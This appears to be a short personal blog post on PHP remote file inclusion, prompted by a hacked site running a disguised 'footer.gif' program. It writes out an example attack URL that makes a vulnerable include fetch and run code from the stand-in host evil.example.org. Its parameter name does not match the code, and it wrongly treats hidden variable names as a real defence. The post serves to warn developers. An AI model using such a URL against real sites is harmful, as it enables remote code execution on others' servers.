I just knew this problem a month ago when one of my friend’s website on my server being hacked and installed a background program. The background program generate huge and useless image and movie files at server.
After hours of inspection at my server, I found the background progam ran under apche’s process. The background program called “footer.gif”. Smart huh? They name the background program as a image file’s name so that people can’t find it.
Actually it is not a bug of security bug in php. It is the problem of open source and careless of the programmer.
The problem occur when your php scripts have code like this:
// example.php
include "$path/script.php";
The page can be requested with http://yourdomain/example.php?page=http%3A%2F%2Fevil.example.org%2F%3F and the script will run as:
// example.php
include "http://evil.example.org/?/script.php";
What will happen then? Your php script will download the code from “http://evil.example.org/?/script.php” and run it as local php file. This is pretty dangerous because the url above can return any malicious code that can harm your server including compile a C program, delete files, scan and read personal data from you server directory and etc.
For more information and solution, you can check the site PHP Security Consortium.
So, if you are using open source script, please make sure they have fixed the security hole mentioned above. And always use the latest stable version of script. It will be more safe if you are you using your own code because nobody will know what are variable names that you are using in your scripts.
Some of the open source php scripts that have this problem:
- WordPress 1.5.2 – Please upgrade to 1.5.3 or above
- Plogger Beta 2 – Please upgrade to 2.1
